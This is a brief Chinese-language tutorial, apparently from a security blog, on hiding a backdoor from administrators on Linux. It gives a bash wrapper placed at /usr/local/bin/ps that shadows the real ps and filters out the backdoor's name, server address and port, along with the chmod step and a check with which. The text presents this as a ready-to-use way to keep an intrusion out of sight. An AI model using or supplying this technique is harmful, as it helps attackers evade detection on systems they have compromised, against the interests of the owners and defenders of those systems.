后门隐藏之进程隐藏技巧(ps、netstat、top、lsof)
⚗️
后门隐藏之进程隐藏技巧(ps、netstat、top、lsof)
ps为例
我们需要做的就是在创建一个/usr/local/bin/ps文件,写入如下内容
#!/bin/bash
/bin/ps $@ | grep -Ev 'backdoor name|backdoor server address|backdoor server port'
赋予执行权限
chmod +x /usr/local/bin/ps
执行which ps后显示
/usr/local/bin/ps
就是这么简单就搞定了,执行ps的时候就不会有我们的backdoor信息出现了。我们自己使用时,用/bin/ps就OK了。